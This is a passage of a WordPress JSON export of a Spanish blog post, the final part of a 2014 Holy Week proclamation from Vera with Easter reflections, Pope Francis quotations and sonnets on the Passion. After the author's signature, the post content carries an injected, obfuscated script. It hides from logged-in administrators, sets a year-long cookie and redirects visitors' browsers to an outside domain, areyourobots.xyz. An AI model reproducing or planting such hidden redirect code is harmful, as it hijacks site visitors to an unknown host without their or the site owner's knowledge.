acontecimientos cristianos: la glorificacio\u0301n del Crucificado.<\/p>\n<p>Y a las once de la noche, aunque es hora de tinieblas, repican a gloria nuestros corazones con el volteo alegre de las campanas. Y marchamos al encuentro del Amado en la solemne VIGILIA PASCUAL. Con la llama resucitada del Sen\u0303or reafirmamos nuestros compromisos cristianos. Y salimos de la Eucaristi\u0301a testigos de la Pascua.<\/p>\n<p>\u00a1ANUNCIAMOS TU MUERTE. PROCLAMAMOS TU RESURRECCIO\u0301N!<\/p>\n<p>Porque a partir de entonces ya no seguiremos al Crucificado a secas, sino a Aquel que es la orilla entre Dios y el hombre, entre la luz y la sombra, entre la transcendencia y la humanidad, a Aquel que nos acompan\u0303a en nuestras vidas de cada di\u0301a para hacer ma\u0301s llevaderas nuestras pequen\u0303as cruces.<\/p>\n<p>HOY, adultos, hemos aprendido que para alcanzar la victoria de la Resurreccio\u0301n tenemos que cargar con las cruces que encontremos en el camino de la vida, como \u00c9l paso\u0301 por la noche del Jueves y Viernes Santo. Y comprendemos que el dolor conteni\u0301a en si\u0301 el gozo. No en vano Jesu\u0301s expreso\u0301 esto en la u\u0301ltima cena cuando dijo a sus apo\u0301stoles: \u201cVosotros os entristecere\u0301is, pero vuestra tristeza se cambiara\u0301 en alegr\u00eda\u201d (Jn 16,20).<\/p>\n<p>Precisamente es lo que recuerdo de mi infancia cuando sigo son\u0303ando:<\/p>\n<p>El despertar alegre del Domingo de Resurreccio\u0301n al son de trompetas y tambores. Era el di\u0301a de PASCUA, el d\u00eda ma\u0301s joven del an\u0303o. Por eso \u201cEl Nin\u0303o\u201d habi\u0301a aparecido por nuestras calles con ju\u0301bilo. Se acabaron los d\u00edas de luto: ya no hay tristeza. Somos felices. Volvemos a jugar. Es d\u00eda de risa y de puertas abiertas. Y mayores y nin\u0303os salimos y depositamos ofrendas ante E\u0301l, que, glorioso, luce unos claveles en la mano, explosio\u0301n de Vida. Rodeado de regalos terminara\u0301 su recorrido en la Glorieta, pero el ma\u0301s importante ya lo tenemos todos: nos ha abierto las puertas de la nueva vida, la aute\u0301ntica vida.<\/p>\n<div title=\"Page 14\">\n<div>\n<div>\n<p>Y HOY, como ayer, El Nin\u0303o sigue recogiendo ofrendas. Los penitentes que le acompan\u0303an visten de blanco la alegr\u00eda del acontecimiento. Las campanas voltean en la ermita de la Virgen de las Angustias porque la Vida ha comenzado: El sepulcro de Jesu\u0301s esta\u0301 abierto y vaci\u0301o. Cristo vive. El Evangelio dice que \u00abentro\u0301 tambie\u0301n el otro disci\u0301pulo, el que habi\u0301a llegado el primero al sepulcro; vio y creyo\u0301\u00bb (Jn 20,8).<\/p>\n<p>He aqu\u00ed la clave: \u201cCREYO\u0301\u201d. Y sigue el Evangelio: \u201cpues hasta entonces no habi\u0301an comprendido que segu\u0301n la Escritura Jesu\u0301s debi\u0301a resucitar de entre los muertos\u201d. El disc\u00edpulo supo captar por la fe que aquel vac\u00edo y, a la vez, aquella sa\u0301bana de amortajar y aquel sudario bien doblados eran pequen\u0303as sen\u0303ales del PASO de Dios, de la nueva vida. Lo capto\u0301 Mar\u00eda Magdalena, lo capto\u0301 Pedro, lo capto\u0301 el otro disci\u0301pulo. Lo captar\u00eda Toma\u0301s incluso, porque solo el amor (ya lo hemos dicho) sabe captar aquello que otros no captan. Lo capto\u0301 Cleofa\u0301s. Y todos fueron a proclamar su Resurreccio\u0301n.<\/p>\n<p>HOY, ese \u201cver y creer\u201d de los disci\u0301pulos ha de ser tambie\u0301n nuestro. Nosotros, cristianos, somos los testigos de la Resurreccio\u0301n que, guiados por el amor, estamos convocados a ejercer el ministerio de la esperanza y de la fe de la Pascua. Somos quienes tenemos que anunciar, que proclamar, que Cristo esta\u0301 entre nosotros, que nuestro Dios es un Dios vivo que acompan\u0303a nuestras vidas, que hay que vivir, y vivir cada d\u00eda, y ver a Dios en cada uno de los actos cotidianos que realizamos en nuestro trabajo, en nuestras casas; entre los que nos rodean y entre los que llevamos en nuestro corazones. Sinta\u0301monos alegres por creer en Jesucristo. El mismo Papa Francisco nos dice: \u201cNo sea\u0301is nunca hombres ni mujeres tristes: un cristiano jama\u0301s puede serlo&#8230; Jesu\u0301s esta\u0301 entre nosotros\u201d.<\/p>\n<p>Y sigue: \u201ca veces perdemos el entusiasmo al olvidar que el Evangelio responde a las necesidades ma\u0301s profundas de las personas\u201d. Y expresa con fuerza su conviccio\u0301n: \u201cno es lo mismo haber conocido a Jesu\u0301s que no conocerlo, no es lo mismo caminar con e\u0301l que caminar a tientas, no es lo mismo poder escucharlo que ignorar su Palabra&#8230; \u201c. \u201c&#8230;Seguir, acompan\u0303ar a Cristo, permanecer con E\u0301l, exige un \u201csalir\u201d. Dios salio\u0301 de si\u0301 mismo para venir en medio de nosotros, para traernos su misericordia que salva y dona esperanza: siempre hay luz en el camino\u201d. Y termina: \u201c&#8230;De\u0301jate mirar por el Sen\u0303or. Cuando E\u0301l nos mira nos da la fuerza y nos ayuda a testimoniarle&#8230;\u201d.<\/p>\n<div title=\"Page 15\">\n<div>\n<div>\n<p>Y el mismo San Pablo era consciente de que el Evangelio no pod\u00eda ser testimoniado eficazmente de manera individual. So\u0301lo una comunidad transfigurada por Cristo se constituye en signo crei\u0301ble del Evangelio.<\/p>\n<p>Pues bien, cada SEMANA SANTA, todos nosotros tenemos la ocasio\u0301n de ahondar en el amor de Dios, a trave\u0301s de la Palabra, a trave\u0301s de la Eucaristi\u0301a, a trave\u0301s de nuestras oraciones&#8230; con el firme propo\u0301sito de servirle con fidelidad todos los di\u0301as del an\u0303o y darlo a conocer a quienes no lo conocen, con palabras y con obras, convirtie\u0301ndonos todos en pregoneros de la Buena Nueva, en testigos ante el mundo actual.<\/p>\n<p>Apasionante y ardua tarea para Hermandades y Cofradi\u0301as que, adema\u0301s de trabajar unidos para fomentar una vida cristiana, realizar actividades de apostolado, ejercitar obras de piedad o caridad&#8230; (canon 298 del Co\u0301digo de Derecho Cano\u0301nico), promueven el culto pu\u0301blico, participando de forma visible y arti\u0301stica, para que la Semana Santa sea un hecho diferencial que determina a nuestro pueblo, cuando, convertido en actores del drama de la Pasio\u0301n de Jesucristo, que es tambie\u0301n nuestro drama, proclama y pregona LA BUENA NOTICIA. Y lo hacen creando tradicio\u0301n de aquello en lo que creemos.<\/p>\n<p>Juego de palabras puede parecer \u201ccreer\u201d y \u201ccrear\u201d, pero crear la tradicio\u0301n en la que creemos \u00bfno es avanzar en la revelacio\u0301n interior de un Dios que esta\u0301 ma\u0301s dentro de nosotros mismos que nuestro propio yo? No en vano los dos verbos conjugan de igual forma la primera persona: \u201cyo creo\u201d.<\/p>\n<p>Asi\u0301 nuestras sagradas ima\u0301genes, enriquecidas con la mu\u0301sica, con las mantillas, con las saetas, adornadas con todo tipo de ornamentos&#8230; despiertan los sentimientos de quienes trabajan en ello y de quienes las contemplan, porque a trave\u0301s de los misterios terrenales de Jesucristo que evocan, lo que vivimos y sentimos como cristianos, como cofrades, como ciudadanos en definitiva, es hermandad, solidaridad y entrega a los dema\u0301s, dando ejemplo de fe, manteniendo viva la historia y respetando nuestras tradiciones.<\/p>\n<p>Yo, Pregonera de Semana Santa 2014, ensanchados mis pulmones de cristiana, he venido a proclamarla, a espaciarla, y quiero hacerlo, porque CREO, con estos versos que han brotado de mi interior, como latidos necesarios para vivir y son\u0303ar:<\/p>\n<p>La pasio\u0301n, muerte y resurreccio\u0301n de Jesucristo.<\/p>\n<div title=\"Page 16\">\n<div>\n<div>\n<p>Celebras ya la pascua, es Jueves Santo, te cin\u0303es la toalla a la cintura,<br \/>\ntomas los pies amigos con ternura,<br \/>\nlos lavas, y secas con blanco manto.<\/p>\n<p>Que se laven los pies unos a otros<br \/>\nles dices, y ensen\u0303as hermoso oficio,<br \/>\nen acto de amor, entrega y servicio:<br \/>\n\u201cId y haced lo que yo he hecho con vosotros\u201d.<\/p>\n<p>Instituyes despue\u0301s la Eucarist\u00eda:<br \/>\npan y vino tu cuerpo y sangre son,<br \/>\ny les pronuncias de gracias la accio\u0301n: \u201cHaced esto en conmemoracio\u0301n m\u00eda\u201d.<\/p>\n<p>Digno hombre, cuyo destino no ignoras, vas a Getseman\u00ed a retirarte<br \/>\nen oracio\u0301n, dispuesto a entregarte<br \/>\na aquellos que te buscan a deshoras.<\/p>\n<p>Env\u00edate a azotar Poncio Pilato, insultado, escarnecido y vejado, golpeado, herido y humillado, atado a la columna del maltrato.<\/p>\n<p>Corona de espinas, rostro sereno, cargando cruz pesada, en santa suerte, dolorido caminas a la muerte,<br \/>\nTu\u0301, Nuestro Padre Jesu\u0301s Nazareno.<\/p>\n<p>Amanece, afligido, Viernes Santo,<br \/>\na la calle sale el pueblo a acompan\u0303arte, de tus ca\u00eddas quisiera levantarte,<br \/>\ny aliviar tanto peso y dolor tanto.<\/p>\n<p>Terminas larga y dolorosa v\u00eda.<br \/>\nYa en tu cruz, de manos y pies clavado, \u201cDios m\u00edo, por que\u0301 me has abandonado\u201d exclamas exa\u0301nime todavi\u0301a.<\/p>\n<div title=\"Page 17\">\n<div>\n<div>\n<p>Junto a la Cruz tu Madre y Juan, los ves, y dices: \u201cMujer, ah\u00ed tienes a tu hijo\u201d<br \/>\ny ma\u0301s au\u0301n, todav\u00eda en crucifijo:<br \/>\n\u201cHijo, ah\u00ed tienes a tu madre\u201d, pues.<\/p>\n<p>(Virgen Santa de Gracia y Esperanza, Madre de Cristo Misericordioso,<br \/>\nsi nuestro corazo\u0301n llora luctuoso,<br \/>\na Ti acudimos con plena confianza).<\/p>\n<p>La hora es y todav\u00eda respiras<br \/>\ny una esponja en vinagre empapada te dan a beber; con sed calmada, inclinando la cabeza expiras.<\/p>\n<p>Entregado al Padre en su voluntad, sostenerte espera mujer gloriosa entre maternales brazos, llorosa, delicada Virgen de la Piedad.<\/p>\n<p>(Madre piadosa y compasiva, implora por tus hijos todos, con suave abrazo, aco\u0301genos con \u00c9l en tu regazo,<br \/>\nReina de San Ramo\u0301n, Nuestra Sen\u0303ora).<\/p>\n<p>Consumada esta\u0301 con gran amor la hora, descansa ya tranquilo y sin quebranto. Yacente duermes en Sepulcro Santo, detra\u0301s tu Madre, nuestra protectora.<\/p>\n<p>(Virgen de las Angustias, \u00bfte has mirado?, sal de tu Soledad y, entre otros dones, conce\u0301denos indulgentes Perdones<br \/>\ny Esperanza en Jesu\u0301s resucitado).<\/p>\n<p>Vigilia Pascual \u201cde esperanza plena&#8230; una explosio\u0301n de luz y de armon\u00eda,<br \/>\ny un fluir generoso de alegr\u00eda&#8230;<br \/>\nUn sentir que esta\u0301 el alma toda llena!\u201d<\/p>\n<div title=\"Page 18\">\n<div>\n<div>\n<p>Con fe a tu Resurreccio\u0301n llegamos,<br \/>\ntu despertar nos trae la Nueva aurora; de otro Domingo bendita fue la hora que con Ramos y palmas te aclamamos.<\/p>\n<p>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;<\/p>\n<p>Semana Santa de ayer, son\u0303ada hoy, Semana Santa de hoy, tambie\u0301n son\u0303ada, Semana Santa por siempre esperada, Semana Santa, con fe viviendo voy.<\/p>\n<p>Preparados ya durante esta Cuaresma, limpios y dispuestos ya nuestros corazones, NIN\u0303OS, JO\u0301VENES Y MAYORES, COFRADES Y COSTALEROS, HERMANOS TODOS EN CRISTO, vivamos esta Semana Santa desde la Palabra, la Eucaristi\u0301a, la oracio\u0301n, desde las estaciones de penitencia y desfiles procesionales, expresiones todas ellas variadas de nuestra fe. Y haga\u0301moslo con proyeccio\u0301n a seguir en la tarea de dar testimonio todos los di\u0301as del an\u0303o. Acompan\u0303emos a Jesu\u0301s desde su entrada a Jerusale\u0301n hasta la Resurreccio\u0301n. Y no dejemos que en nuestras manos se marchiten los ramos de olivo con que aclama\u0301bamos su llegada.<\/p>\n<p>\u00a1FELIZ PASCUA DE RESURRECCIO\u0301N!<\/p>\n<p>Vera, a 5 de abril de 2014<\/p>\n<p>Mari Carmen Morales Carmona.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>INTRODUCCIO\u0301N Y DEDICATORIA PREGO\u0301N SEMANA SANTA 2014 Muchas gracias, Isabel, no solo por estas carin\u0303osas palabras con que me presentas, sino tambie\u0301n por las que me dirigiste por tele\u0301fono dos di\u0301as despue\u0301s de esta designacio\u0301n. Me dijiste que entendi\u0301as mis nervios porque es cierto que con mucha responsabilidad hay que asumir esta tarea, pero tambie\u0301n &hellip; <a href=\"https:\/\/blog.vera.es\/cultura\/2014\/04\/16\/pregon-semana-santa-2014\/\" class=\"more-link\">Seguir leyendo <span class=\"screen-reader-text\">PREG\u00d3N SEMANA SANTA 2014<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":298,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,20],"tags":[19,18],"class_list":["post-297","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-colaboraciones","tag-pregon","tag-semana-santa"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=297"}],"version-history":[{"count":5,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/297\/revisions"}],"predecessor-version":[{"id":1692,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/297\/revisions\/1692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/298"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}